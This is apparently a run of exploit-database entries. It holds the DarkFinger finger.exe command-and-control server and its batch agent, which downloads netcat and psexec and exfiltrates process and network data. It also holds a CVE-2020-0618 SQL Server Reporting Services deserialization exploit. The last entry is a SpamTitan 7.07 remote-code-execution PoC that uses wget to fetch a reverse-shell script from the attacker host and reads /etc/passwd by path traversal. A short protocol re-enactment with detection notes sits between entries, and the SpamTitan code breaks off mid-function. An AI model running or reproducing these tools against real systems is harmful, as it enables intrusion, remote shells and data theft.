                            print("[!] Disallowed port change request from: %s" % addr[0])
                #Let agent set time to wait dynamically.
                if a[:1] != "." and a[:1] != "!":
                    if re.search(r'\d\d', a[2:4]):
                        delay=int(a[2:4])
                        print("[-] Agent set the delay to: %d" % delay)
                        sys.stdout.flush()
            except Exception as e:
                print(str(e))
                pass
            t = finga_that_box(a, addr)
            if t:
                exe = B64Exec(t)
                if exe == 9:
                    conn.close()
                    continue
                if exe:
                    try:
                        conn.sendall(exe.encode())
                        time.sleep(delay)
                        conn.close()
                        delay=1
                    except Exception as e:
                        pass
                        #print(str(e))
            sys.stdout.flush()
            conn.close()
            delay=1
        s.close()
    except Exception as e:
        print(str(e))
        pass
    finally:
        s.close()
        fileppe_fingaz()

def about():
    print("[+] Darkfinger is a basic C2 server that processes Windows TCPIP Finger Commands.")
    print(" ")
    print("[+] File download requests require the first two chars (lowercase) for the file we want,")
    print("[+] plus the wait time, this tries to ensure a full transmit before closing the connection.")
    print("[+] Download Ncat64.exe and wait 30-secs before closing the socket:")
    print("[+] finger.exe nc30@DarkFinger > tmp.txt")
    print(" ")
    print("[+] Exfil Windows Tasklist using the '.' character used as the DarkFinger exfil flag:")
    print("[+] cmd /c for /f \"tokens=1\" %i in ('tasklist') do finger .%i@DarkFinger-Server")
    print("[+]")
    print("[+] If Port 79 is blocked, use Windows Netsh Portproxy to reach allowed internet Ports.")
    print("[+] Dynamically change the port Darkfinger C2 listens on to port 80:")
    print("[+] finger.exe !80!@DarkFinger-Server")
    print(" ")
    print("[+] DarkFinger-Agent.bat script is the client side component to demonstrate capabilities.")
    print("[+] Note: This is just a basic PoC with no type of real security whatsoever.")
    print("[+] Disclaimer: Author not responsible for any misuse and or damages by using this software.")

def main(args):
    global port
    print(BANNER)
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    if args.about:
        about()
        exit()
    if args.port:
        port = int(args.port)
    if args.conf and args.delete:
        delete_base64_files()
    if args.conf:
        create_base64_files(args.conf)
    else:
        print("[!] Warn: No Base64 files created for download!, add required -c flag.")
        exit()
    fileppe_fingaz()

def parse_args():
    parser.add_argument("-p", "--port", help="C2 Server Port", nargs="?")
    parser.add_argument("-c", "--conf", help="Textfile of tools to Base64 encode for download.", nargs="?")
    parser.add_argument("-d", "--delete", nargs="?", const="1", help="Delete previously created Base64 encoded files on startup, -c required.")
    parser.add_argument("-a", "--about", nargs="?", const="1", help="Darkfinger information")
    return parser.parse_args()

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    main(parse_args())

[DarkFinger-Agent.bat]

@ECHO OFF
CLS
ECHO [+] Windows TCPIP Finger CMD Agent (c)
ECHO [+] For DarkFinger C2 Server PoC
ECHO [+] By hyp3rlinx
ECHO [+] ApparitionSec
ECHO ===================================
@ECHO.

REM Default download save location.
CD \Users\%username%\Desktop

REM Default download delay time to try and ensure full transfer.
SET DELAY=10
SET FAIL_MSG=[!] Attempted a failed Admin operation ugh :(

net session >nul 2>&1
IF %errorLevel% == 0 (
    ECHO [+] Got Admin privileges!.
    SET /a Admin = 0
    GOTO Init
) ELSE (
    ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!.
    SET /a Admin = 1
    SET DARK_PORT=79
    GOTO CheckOutbound79
)

:Init
for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%b
SET LOCAL_IP=%LOCAL_IP: =%
ECHO [+] Local IP: %LOCAL_IP%
REM default for non admin as cant set Portproxy.
SET /P DARK_IP="[+] DarkFinger C2 Host/IP: "
SET /P DARK_PORT="[+] DarkFinger C2 Port: "
IF NOT %DARK_PORT%==79 (
    ECHO [!] Ports other than 79 typically require a Portproxy.
    GOTO AddNetshPortProxy
) ELSE (
    GOTO CmdOpt
)

:CheckOutbound79
ECHO [!] Must use the default Port 79 :( good luck.
SET /P CHKPORT="[+] Check if hosts reachable? Y to continue N to abort: "
SET CHKPORT=%CHKPORT: =%
IF /I %CHKPORT% == y (
    SET /P DARK_IP="[+] DarkFinger C2 Host/IP: "
    cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}"
    ECHO.
) ELSE (
    ECHO [!] Aborting... :(
    GOTO Close
)

:CmdOpt
ECHO 1.Download PsExec64
ECHO 2.Download Nc64
ECHO 3.Exfil Tasklist
ECHO 4.Exfil IP Config
ECHO 5.Remove Netsh PortProxy
ECHO 6.Change C2 Server Port - 22 43 53 79 80 443
ECHO 7.Show Current Portproxy
ECHO 8.Change Portproxy
ECHO 9.Delete Portproxy and exit
ECHO 10.Exit Agent
@ECHO.
SET /P doit="Select option: "
IF "%doit%"=="1" GOTO PsExec64
IF "%doit%"=="2" GOTO Nc64
IF "%doit%"=="3" GOTO ExfilTasklist
IF "%doit%"=="4" GOTO ExfilIPConfig
IF "%doit%"=="5" GOTO RemNetShPortProxy
IF "%doit%"=="6" GOTO ChgC2ServerPort
IF "%doit%"=="7" GOTO ShowPortProxy
IF "%doit%"=="8" GOTO ChgPortProxy
IF "%doit%"=="9" GOTO DelProxyNClose
IF "%doit%"=="10" GOTO Close

:ChgPortProxy
IF %Admin% == 0 (
    GOTO Init
) ELSE (
    ECHO %FAIL_MSG%
    @ECHO.
    GOTO CmdOpt
)

:PsExec64
SET Tool=PS
ECHO [-] Downloading PsExec64.exe, saving to Desktop as PS.EXE
ECHO [-] Wait...
IF %DARK_PORT%==79 (
    SET IP2USE=%DARK_IP%
) ELSE (
    SET IP2USE=%LOCAL_IP%
)
call finger ps%DELAY%@%IP2USE% > tmp.txt
GOTO CleanFile

:Nc64
SET Tool=NC
ECHO [-] Downloading Nc64.exe, saving to Desktop as NC.EXE
ECHO [-] Wait...
IF %DARK_PORT%==79 (
    SET IP2USE=%DARK_IP%
) ELSE (
    SET IP2USE=%LOCAL_IP%
)
call finger nc%DELAY%@%IP2USE% > tmp.txt
GOTO CleanFile

REM remove first two lines of tmp.txt as they contain the Computer name.
:CleanFile
call cmd /c more +2 tmp.txt > %Tool%.txt
GOTO RemoveTmpFile

:RemoveTmpFile
call cmd /c del %CD%\tmp.txt
GOTO B64Exe

REM Reconstruct executable from the Base64 text-file.
:B64Exe
call certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nul
@ECHO.
call cmd /c del %CD%\%Tool%.txt
GOTO CmdOpt

:ExfilTasklist
REM uses "." prefix to flag as incoming exfil data.
IF "%DARK_PORT%"=="79" (
    SET USE_IP=%DARK_IP%
) ELSE (
    SET USE_IP=%LOCAL_IP%
)
cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP%
GOTO CmdOpt

:ExfilIPConfig
REM uses "." prefix to flag as incoming exfil data.
IF "%DARK_PORT%"=="79" (
    SET USE_IP=%DARK_IP%
) ELSE (
    SET USE_IP=%LOCAL_IP%
)
cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do finger ".%%a"@%USE_IP%
GOTO CmdOpt

:DelProxyNClose
ECHO [!] Removing any previous Portproxy from registry and exiting.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1
ECHO [!] Exiting...
EXIT /B

:AddNetshPortProxy
SET OK=0
SET /P OK="[!] 1 to Continue:"
IF NOT %OK% EQU 1 (
    ECHO [!] Aborted...
    @ECHO.
    GOTO CmdOpt
)
ECHO [!] Removing any previous Portproxy from registry.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1
SET LOCAL_FINGER_PORT=79
IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
IF %Admin% == 0 netsh interface portproxy show all
GOTO CmdOpt

:RemNetShPortProxy
IF %Admin% == 1 (
    ECHO %FAIL_MSG%
    @ECHO.
    GOTO CmdOpt
) ELSE (
    ECHO [!] Removing NetSh PortProxy from registry.
    REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1
)
IF %DARK_PORT%==79 (
    GOTO CmdOpt
) ELSE (
    GOTO Init
)

:ShowPortProxy
netsh interface portproxy show all
GOTO CmdOpt

REM Allows agent to change the DarkFinger C2 listener port.
:ChgC2ServerPort
IF %Admin% == 1 (
    ECHO %FAIL_MSG%
    @ECHO.
    GOTO CmdOpt
)
SET /P TMP_PORT="[+] DarkFinger listener Port: "
IF %DARK_PORT%==79 finger !%TMP_PORT%!@%DARK_IP%
IF NOT %DARK_PORT%==79 finger !%TMP_PORT%!@%LOCAL_IP%
SET DARK_PORT=%TMP_PORT%
ECHO [!] Attempted to change the DarkFinger remote Port to %TMP_PORT%.
IF NOT %DARK_PORT%==79 ECHO [!] Non default finger port used, must set a new Portproxy. (
    GOTO RemNetShPortProxy
) ELSE (
    GOTO CmdOpt
)

:Close
EXIT /B

[PoC Video URL]
https://www.youtube.com/watch?v=cfbwS6zH7ks

[Network Access]
Remote

[Disclosure Timeline]
September 11, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
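What finger.exe puts on the wire is small enough to re-enact end to end: one TCP connection, the "user" part of `user@host` followed by CRLF (RFC 1288), then whatever the daemon answers, which the client prints and the operator redirects to a file. The block below is an added example, not DarkFinger's code: it models the three query shapes the post describes (`xxNN` download with wait time, `.data` exfil, `!NN!` port change), runs a minimal server and a finger-like client against each other on 127.0.0.1, and returns the recovered tool bytes and exfil lines so the exchange can be checked. The served "tool" is a few constructed bytes standing in for the certutil-encoded nc/psexec files the post uses, and `latin-1` is my choice for decoding the query so that any byte the agent sends survives parsing.

```python
"""
Loopback re-enactment of the Finger-as-C2 exchange: a finger-style client,
a server that dispatches on the 'user' token, and the bytes that flow.
Added example; not DarkFinger's code.
"""
import base64
import socket
import socketserver
import threading
from typing import Optional, Tuple

# Constructed stand-ins for the Base64-served tools (the real thing is a
# certutil -encode of nc64/psexec64 with the certificate lines stripped).
TOOLS = {
    "nc": b"MZ\x90\x00constructed-netcat-stub",
    "ps": b"MZ\x90\x00constructed-psexec-stub",
}


def parse_query(line: bytes) -> Tuple[str, Optional[str], Optional[int]]:
    """Classify the finger 'user' token as the post's C2 does.

    Returns (kind, argument, delay) with kind in
    'port' ('!80!'), 'exfil' ('.svchost.exe'), 'download' ('nc30'), 'other'.
    """
    q = line.rstrip(b"\r\n").decode("latin-1")
    if q.startswith("/W "):                 # RFC 1288 verbose switch, if a client sends it
        q = q[3:]
    if len(q) > 2 and q[0] == "!" and q[-1] == "!" and q[1:-1].isdigit():
        return ("port", q[1:-1], None)
    if q.startswith("."):
        return ("exfil", q[1:], None)
    name, digits = q[:2], q[2:4]
    if name in TOOLS:
        return ("download", name, int(digits) if digits.isdigit() else 1)
    return ("other", q, None)


class FingerC2Handler(socketserver.StreamRequestHandler):
    """One query per connection, as with a real finger daemon."""

    def handle(self) -> None:
        kind, arg, _delay = parse_query(self.rfile.readline(1024))
        if kind == "download":
            # finger.exe prints the reply verbatim (after a '[host]' header line,
            # which the agent strips with 'more +2'), so a Base64 body can be
            # redirected straight to a file and certutil -decode'd.
            self.wfile.write(base64.b64encode(TOOLS[arg]) + b"\r\n")
        elif kind == "exfil":
            self.server.exfil.append(arg)   # type: ignore[attr-defined]
        # 'port' would make DarkFinger rebind; here it is only recorded.
        elif kind == "port":
            self.server.port_requests.append(int(arg))   # type: ignore[attr-defined]
        # 'other' and 'port' get an empty reply, like an unknown user would.


def finger_query(host: str, port: int, user: str) -> bytes:
    """What 'finger user@host' does: connect, send 'user\\r\\n', read until close."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(user.encode("latin-1") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def run_exchange() -> dict:
    """Serve on an ephemeral loopback port, play the agent, return what crossed."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), FingerC2Handler)
    srv.exfil, srv.port_requests = [], []   # type: ignore[attr-defined]
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    host, port = srv.server_address[:2]
    try:
        blob = finger_query(host, port, "nc30")          # download, agent asks for 30s grace
        tool = base64.b64decode(blob)
        for proc in ("svchost.exe", "lsass.exe"):          # the tasklist exfil loop
            finger_query(host, port, "." + proc)
        finger_query(host, port, "!80!")                   # port-change request
        return {"tool": tool, "exfil": list(srv.exfil), "ports": list(srv.port_requests)}
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(run_exchange())
```

DarkFinger sleeps for the agent-supplied delay before closing the download socket; with `sendall` followed by a normal close the client reads to EOF and gets every byte, so the wait is omitted here. For defenders, the observables are the same whichever port the portproxy maps: a `finger.exe` process creation with an outbound connection (Sysmon event IDs 1 and 3 if Sysmon is deployed), and a TCP session on 80/443 whose only client data is a short line ending in CRLF with no HTTP request following it.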
  8. # Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
# Google Dork: inurl:ReportViewer.aspx
# Date: 2020-09-17
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR), Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL Server 2012 32-bit/x64 SP2 (QFE)
# Tested on: Windows 2016
# CVE : CVE-2020-0618
# Credit goes to Soroush Dalili
# Source:
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618
# https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/

#!/usr/bin/python
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
import argparse, requests, logging
from bs4 import BeautifulSoup
from sys import argv, exit, stderr, stdout

# to create a payload (default is bindshell on 0.0.0.0:65535):
# .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..."

class Exploit:
    payload = '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'
    timeout = 0.5
    cookies = {}
    params = {}

    def __init__(self, opt):
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.username = '%s\\%s' % (opt.domain, opt.username)
        self.target = '%s%s' % (opt.target, opt.path)
        self.password = opt.password
        self.session = requests.session()
        self.redirect = opt.redirect
        self.proxies = {
            'http': 'http://%s' % opt.proxy,
            'https': 'http://%s' % opt.proxy
        } if opt.proxy != '' else {}
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        self.form = {
            '__VIEWSTATE': '',
            'NavigationCorrector$PageState': 'NeedsCorrection',
            'NavigationCorrector$ViewState': self.payload
        }
        if opt.debug:
            self.debug()

    def info(self, message):
        stdout.write('[+] %s\n' % str(message))
        return self

    def error(self, message):
        stderr.write('[-] error: %s\n' % str(message))
        return self

    def doGet(self, url, params=None, values=None):
        self.info('sending get request to %s' % url)
        try:
            return self.session.get(
                url=url,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                data=values,
                params=params,
                auth=HttpNtlmAuth(self.username, self.password)
            ) if self.username != '\\' else self.session.get(
                url=url,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                data=values,
                params=params
            )
        except Exception as err:
            self.error(err)

    def doPost(self, url, values=None, params=None):
        self.info('sending post request to %s' % url)
        try:
            return self.session.post(
                url=url,
                data=values,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                params=params,
                auth=HttpNtlmAuth(self.username, self.password)
            ) if self.username != '\\' else self.session.post(
                url=url,
                data=values,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                params=params
            )
        except Exception as err:
            self.error(err)

    def parsePage(self, content):
        self.info('parsing form values')
        soup = BeautifulSoup(content, 'lxml')
        for tag in soup.select('input'):
            try:
                self.form[tag['name']] = tag['value']
            except Exception as err:
                self.error(err)
        return self

    def debug(self):
        self.info('debugging enabled')
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def getForm(self):
        self.info('retrieving form values')
        resp = self.doGet(url=self.target)
        self.parsePage(content=resp.content)
        return self

    def exploit(self):
        self.info('exploiting target')
        resp = self.doPost(url=self.target, params=self.params, values=self.form)
        self.info('received response %d' % resp.status_code)
        return self


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='CVE-2020-0618 SQL Server Reporting Services ViewState Deserialization exploit',
        add_help=True
    )
    try:
        parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ')
        parser.add_argument('-username', action='store', default='', help='Username to use: first.last')
        parser.add_argument('-domain', action='store', default='', help='User domain to use: domain.local')
        parser.add_argument('-password', action='store', default='', help='Password to use: Summer2020')
        parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False')
        parser.add_argument('-redirect', action='store', default=False, help='Follow redirects: False')
        parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080')
        parser.add_argument('-path', action='store', default='/ReportServer/pages/ReportViewer.aspx', help='Path to page')
        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()
        Exploit(opt=options).exploit()
    except Exception as error:
        stderr.write('[-] error in main %s\n' % str(error))

Regards,
West Shepherd
OSWE | OSCE | OSCP | OSWP | CEH | Security+
West Lee Shepherd, LLC
  9. # Exploit Title: SpamTitan 7.07 - Remote Code Execution (Authenticated)
# Date: 2020-09-18
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/
# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway
# Version: 7.07
# Tested on: FreeBSD
# CVE : CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804

---[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]------------------------------

SECURITY ADVISORY: SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution
Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions)
Vulnerability: Multiple Authenticated Remote Code Execution
CVSSv3: 8.7 (https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N)
Severity: High
Release Date: 2020-09-18
CVEs: CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804

I. Background
~~~~~~~~~~~~~

From www.spamtitan.com:

"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network administrators with extensive tools to control mail flow and protect against unwanted email and malware."

II. Description
~~~~~~~~~~~~~~~

Multiple authenticated remote code execution (RCE) vulnerabilities were found on the SpamTitan Gateway 7.07 and probably in previous versions:

* CVE-2020-11699: Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page.

* CVE-2020-11700: Improper sanitization of the parameter fname, used on the page certs-x.php, would allow an attacker to retrieve the contents of arbitrary files. The user has to be authenticated before interacting with this page.

* CVE-2020-11803: Improper sanitization of the parameter jaction when interacting with the page mailqueue.php could lead to PHP code evaluation server-side, because the user-provided input is passed directly to the php eval() function. The user has to be authenticated on the web platform before interacting with the page.

* CVE-2020-11804: Due to improper sanitization of the parameter qid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request.

III. PoC
~~~~~~~~

Use python 3 and install the following modules before executing: requests.

If your IP is 192.168.1.5 and the target SpamTitan server is spamtitan.example.com, call the PoC like this:

./multirce.py -t spamtitan.example.com -i 192.168.1.5 -m <EXPLOIT NUMBER> -u <USER> -p <PASSWORD> -U http://192.168.1.5/rev.py

---------------------------------------------

#!/usr/bin/env python
# Author: Felipe Molina (@felmoltor)
# Date: 09/04/2020
# Python Version: 3.7
# Summary: This is PoC for multiple authenticated RCE and Arbitrary File Read
# 0days on SpamTitan 7.07 and previous versions.
# Product URL: https://www.spamtitan.com/
# Product Version: 7.07 and probably previous

import requests
from requests import Timeout
requests.packages.urllib3.disable_warnings()
import os
import threading
from optparse import OptionParser
import socket
import json
import re
from urllib.parse import urlparse
from time import sleep
from base64 import b64decode,b64encode

def myip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # doesn't even have to be reachable
        s.connect(('10.255.255.255', 1))
        IP = s.getsockname()[0]
    except:
        IP = '127.0.0.1'
    finally:
        s.close()
    return IP

def shellServer(ip,port,quiet):
    servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    servers.bind((ip, port))
    servers.listen(1)
    info("Waiting for incoming connection on %s:%s" % (ip,port))
    conn, addr = servers.accept()
    conn.settimeout(1)
    success("Hurray, we got a connection from %s" % addr[0])
    prompt =conn.recv(128)
    prompt=str(prompt.decode("utf-8")).strip()
    command = input(prompt)
    while True:
        try:
            c = "%s\n" % (command)
            if (len(c)>0):
                conn.sendall(c.encode("utf-8"))
            # Quit the console
            if command == 'exit':
                info("\nClosing connection")
                conn.close()
                break
            else:
                completeanswer=""
                while True:
                    answer=None
                    try:
                        answer=str((conn.recv(1024)).decode("utf-8"))
                        completeanswer+=answer
                    except socket.timeout:
                        completeanswer.strip()
                        break
                print(completeanswer,end='')
                command = input("")
        except (KeyboardInterrupt, EOFError):
            info("\nClosing connection")
            break

# This is an authenticated remote code execution in "certs-x.php". E.g:
def CVE_2020_11699(cookies, target, shellurl):
    # Giving time to the main thread to open the reverse shell listener
    sleep(5)
    oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl)
    t1 = "%s/certs.php" % target
    t2 = "%s/certs-x.php" % target
    # get the csrf token value
    res1 = requests.get(t1,cookies=cookies,verify=False)
    m = re.search("var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
    if (m is not None):
        csrfguard=m.group(1)
        csrftoken=m.group(2)
        data = {
            "CSRFName":csrfguard,
            "CSRFToken":csrftoken,
            "jaction":"deletecert",
            "fname":"dummy || $(%s)" % oscmd
        }
        info("Triggering the reverse shell in the target.")
        try:
            res2 = requests.post(t2,data=data,cookies=cookies,verify=False)
            print(res2.text)
        except Timeout:
            info("Request timed-out. You should have received already your reverse shell.")
    else:
        fail("CSRF tokens were not found. POST will fail.")

# This is an arbitrary file read on "certs-x.php"
def CVE_2020_11700(cookies,target,file):
    fullpath="../../../..%s" % file
    t1 = "%s/certs.php" % target
    t2 = "%s/certs-x.php" % target
    # get the csrf token value
    res1 = requests.get(t1,cookies=cookies,verify=False)
    m = re.search("var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
    if (m is not None):
        csrfguard=m.group(1)
        csrftoken=m.group(2)
        data = {
            "CSRFName":csrfguard,
            "CSRFToken":csrftoken,
            "jaction":"downloadkey",
            "fname":fullpath,
            "commonname":"",
            "organization":"",
            "organizationunit":"",
            "city":"",
            "state":"",
            "country":"",
            "csrout":"",
            "pkout":"",
            "importcert":"",
            "importkey":"",
            "importchain":""
        }
        res2 = requests.post(t2,data=data,cookies=cookies,verify=False)
        if (res2.status_code == 200):
            success("Contents of the file %s" % file)
            print(res2.text)
    else:
        fail("Error obtaining the CSRF guard tokens from the page.")
        return False

# This is an authenticated RCE abusing PHP eval function in mailqueue.php
def CVE_2020_11803(cookies, target, shellurl):
    # Giving time to the main thread to open the reverse shell listener
    sleep(5)
    oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl)
    b64=(b64encode(oscmd.encode("utf-8"))).decode("utf-8")
    payload="gotopage+a+\";$b=\"%s\";shell_exec(base64_decode(urldecode($b)));die();$b=\"" % (b64)
    t1 = "%s/certs.php" % target
    t2 = "%s/mailqueue.php" % target
    # get the csrf token value
    res1 = requests.get(t1,cookies=cookies,verify=False)
    m = re.search("var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
    if (m is not None):
        csrfguard=m.group(1)
        csrftoken=m.group(2)
        data = {
            "CSRFName":csrfguard,
            "CSRFToken":csrftoken,
            "jaction":payload,
            "activepage":"incoming",
            "incoming_count":"0",
            "active_count":"0",
            "deferred_count":"0",
            "hold_count":"0",
            "corrupt_count":"0",
            "incoming_page":"1",
            "active_page":"1",
            "deferred_page":"1",
            "hold_page":"1",
            "corrupt_page":"1",
            "incomingrfilter":None,
            "incomingfilter":None,
            "incoming_option":"hold",
            "activerfilter":None,
            "activefilter":None,
            "active_option":"hold",
            "deferredrfilter":None,
            "deferredfilter":None,
            "deferred_option":"hold",
            "holdrfilter":None,
            "holdfilter":None,
            "hold_option":"release",
            "corruptrfilter":None,
            "corruptfilter":None,
            "corrupt_option":"delete"
        }
        # We have to pass a string instead of a dict if we don't want the requests library to convert it to
        # an urlencoded data and break our payload
        datastr=""
        cont=0
        for k,v in data.items():
            datastr+="%s=%s" % (k,v)
            cont+=1
            if (cont<len(data)):
                datastr+="&"
        headers={
            "User-Agent":"Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        try:
            res2 = requests.post(t2,data=datastr,cookies=cookies,headers=headers,verify=False,proxies=proxies)
        except Timeout:
            info("Request timed-out. You should have received already your reverse shell.")
    else:
        fail("CSRF tokens were not found. POST will fail.")

# This is an authenticated RCE abusing qid GET parameter in mailqueue.php
def CVE_2020_11804(cookies, target, shellurl):
    # Giving time to the main thread to open the reverse shell listener
    sleep(5)
    oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl)
    payload="1;`%s`" % oscmd
    t = "%s/mailqueue.php?qid=%s" % (target,payload)
    info("Triggering the reverse shell in the target.")
    try:
        res2 = requests.get(t,cookies=cookies,verify=False)
    except Timeout:
        info("Request timed-out. You should have received already your reverse shell.")

# Authenticate to the web platform and get the cookies
def authenticate(target,user,password):
    loginurl="%s/login.php" % target
    data={
        "jaction":"none",
        "language":"en_US",
        "address":"%s" % user,
        "passwd":"%s" % password
    }
    res = requests.post(loginurl, data=data,allow_redirects = False,verify=False)
    if (res.status_code == 302 and len(res.cookies.items())>0):
        return res.cookies
    else:
        return None

def printmsg(msg,quiet=False,msgtype="i"):
    if (not quiet):
        if (success):
            print("[%s] %s" % (msgtype,msg))
        else:
            print("[-] %s" % msg)

def info(msg,quiet=False):
    printmsg(msg,quiet,msgtype="i")

def success(msg,quiet=False):
    printmsg(msg,quiet,msgtype="+")

def fail(msg,quiet=False):
    printmsg(msg,quiet,msgtype="-")

def parseoptions():
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target", help="Target SpamTitan URL to attack. E.g.: https://spamtitan.com/", default=None)
    parser.add_option("-m", "--method", dest="method", help="Exploit number: (1) CVE-2020-11699 [RCE], (2) CVE-2020-XXXX [RCE], (3) CVE-2020-XXXX2 [RCE], (4) CVE-2020-11700 [File Read]", default=1)
    parser.add_option("-u", "--user", dest="user", help="Username to authenticate with. Default: admin", default="admin")
    parser.add_option("-p", "--password", dest="password", help="Password to authenticate with. Default: hiadmin", default="hiadmin")
    parser.add_option("-I", "--ip", dest="ip", help="Local IP where to listen for the reverse shell. Default: %s" % myip(), default=myip())
    parser.add_option("-P", "--port", dest="port", help="Local Port where to listen for the reverse shell. Default: 4242", default=4242)
    parser.add_option("-U", "--URL", dest="shellurl", help="HTTP URL path where the reverse shell is located. Default: http://%s/rev.py" % myip(), default="http://%s/rev.py" % myip())
    parser.add_option("-f", "--filetoread", dest="filtetoread", help="Full path of the file to read from the remote server when executing CVE-2020-11700. Default: /etc/passwd", default="/etc/passwd")
    parser.add_option("-q", "--quiet", action="store_true", dest="quiet", default=False, help="Shut up script! Just give me the shell.")
    return parser.parse_args()

def main():
    (options,arguments) = parseoptions()
    quiet = options.quiet
    target = options.target
    ip = options.ip
    port = options.port
    user = options.user
    password = options.password
    shellurl = options.shellurl
    method = int(options.method)
    rfile = options.filtetoread

    # Sanitize options
    if (target is None):
        fail("Error. Specify a target (-t).")
